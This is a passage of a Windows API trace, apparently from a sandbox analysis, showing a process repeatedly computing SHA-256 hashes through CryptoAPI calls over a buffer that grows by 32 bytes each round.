	[0199.740] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0x400, dwFlags=0x0) returned 1
	[0199.740] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.740] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2691f78
	[0199.740] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2691f78, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2691f78, pdwDataLen=0x1283b0) returned 1
	[0199.740] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.740] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.740] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.741] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.741] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x420, dwFlags=0x0) returned 1
	[0199.741] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.741] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2691fa0
	[0199.741] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2691fa0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2691fa0, pdwDataLen=0x1283b0) returned 1
	[0199.741] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.741] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.741] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.741] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.741] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0x440, dwFlags=0x0) returned 1
	[0199.741] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.741] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2691fc8
	[0199.741] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2691fc8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2691fc8, pdwDataLen=0x1283b0) returned 1
	[0199.741] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.741] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.741] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.742] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.742] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x460, dwFlags=0x0) returned 1
	[0199.742] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.742] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2691ff0
	[0199.742] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2691ff0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2691ff0, pdwDataLen=0x1283b0) returned 1
	[0199.742] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.742] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.742] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.742] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.742] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0x480, dwFlags=0x0) returned 1
	[0199.742] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.742] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2692018
	[0199.742] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2692018, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2692018, pdwDataLen=0x1283b0) returned 1
	[0199.742] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.742] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.742] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.743] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.743] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x4a0, dwFlags=0x0) returned 1
	[0199.743] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.743] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2692040
	[0199.743] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2692040, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2692040, pdwDataLen=0x1283b0) returned 1
	[0199.743] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.743] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.743] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.743] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.743] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0x4c0, dwFlags=0x0) returned 1
	[0199.743] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.743] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2692068
	[0199.743] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2692068, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2692068, pdwDataLen=0x1283b0) returned 1
	[0199.743] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.743] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.743] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.744] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.744] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x4e0, dwFlags=0x0) returned 1
	[0199.744] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.744] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2692090
	[0199.744] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2692090, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2692090, pdwDataLen=0x1283b0) returned 1
	[0199.744] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.744] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.744] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.744] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.744] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0x500, dwFlags=0x0) returned 1
	[0199.744] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.744] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26920b8
	[0199.744] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x26920b8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x26920b8, pdwDataLen=0x1283b0) returned 1
	[0199.744] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.744] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.744] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.745] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.745] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x520, dwFlags=0x0) returned 1
	[0199.745] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.745] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26920e0
	[0199.745] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26920e0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x26920e0, pdwDataLen=0x1283b0) returned 1
	[0199.745] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.745] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.745] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.745] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.745] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0x540, dwFlags=0x0) returned 1
	[0199.745] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.745] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2692108
	[0199.745] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2692108, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2692108, pdwDataLen=0x1283b0) returned 1
	[0199.745] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.745] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.745] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.746] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.746] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x560, dwFlags=0x0) returned 1
	[0199.746] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.746] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2692130
	[0199.746] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2692130, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2692130, pdwDataLen=0x1283b0) returned 1
	[0199.746] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.746] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.746] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.746] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.746] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0x580, dwFlags=0x0) returned 1
	[0199.746] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.746] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2692158
	[0199.746] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2692158, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2692158, pdwDataLen=0x1283b0) returned 1
	[0199.746] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.746] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.747] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.747] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.747] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x5a0, dwFlags=0x0) returned 1
	[0199.747] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.747] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2692180
	[0199.747] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2692180, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2692180, pdwDataLen=0x1283b0) returned 1
	[0199.747] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.747] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.747] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.747] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.747] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0x5c0, dwFlags=0x0) returned 1
	[0199.747] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.747] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26921a8
	[0199.747] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x26921a8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x26921a8, pdwDataLen=0x1283b0) returned 1
	[0199.747] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.747] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.748] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.748] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.748] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x5e0, dwFlags=0x0) returned 1
	[0199.748] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.748] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26921d0
	[0199.748] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26921d0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x26921d0, pdwDataLen=0x1283b0) returned 1
	[0199.748] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.748] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.748] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.748] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.748] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0x600, dwFlags=0x0) returned 1
	[0199.748] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.748] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26921f8
	[0199.748] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x26921f8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x26921f8, pdwDataLen=0x1283b0) returned 1
	[0199.748] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.748] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.748] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.749] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.749] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x620, dwFlags=0x0) returned 1
	[0199.749] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.749] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2692220
	[0199.749] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2692220, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2692220, pdwDataLen=0x1283b0) returned 1
	[0199.749] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.749] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.749] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.749] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.749] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0x640, dwFlags=0x0) returned 1
	[0199.749] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.749] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2692248
	[0199.749] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2692248, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2692248, pdwDataLen=0x1283b0) returned 1
	[0199.749] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.749] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.749] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.750] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.750] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x660, dwFlags=0x0) returned 1
	[0199.750] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.750] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2692270
	[0199.750] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2692270, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2692270, pdwDataLen=0x1283b0) returned 1
	[0199.750] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.750] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.750] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.750] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.750] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0x680, dwFlags=0x0) returned 1
	[0199.750] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.750] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2692298
	[0199.750] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2692298, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2692298, pdwDataLen=0x1283b0) returned 1
	[0199.750] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.750] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.750] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.751] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.751] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x6a0, dwFlags=0x0) returned 1
	[0199.751] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.751] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26922c0
	[0199.751] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26922c0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x26922c0, pdwDataLen=0x1283b0) returned 1
	[0199.751] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.751] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.751] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.751] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.751] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0x6c0, dwFlags=0x0) returned 1
	[0199.751] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.751] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26922e8
	[0199.751] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x26922e8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x26922e8, pdwDataLen=0x1283b0) returned 1
	[0199.751] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.751] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.751] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.752] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.752] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x6e0, dwFlags=0x0) returned 1
	[0199.752] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.752] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2692310
	[0199.752] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2692310, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2692310, pdwDataLen=0x1283b0) returned 1
	[0199.752] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.752] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.752] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.752] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.752] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0x700, dwFlags=0x0) returned 1
	[0199.752] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.752] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2692338
	[0199.752] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2692338, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2692338, pdwDataLen=0x1283b0) returned 1
	[0199.752] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.752] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.752] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.753] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.753] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x720, dwFlags=0x0) returned 1
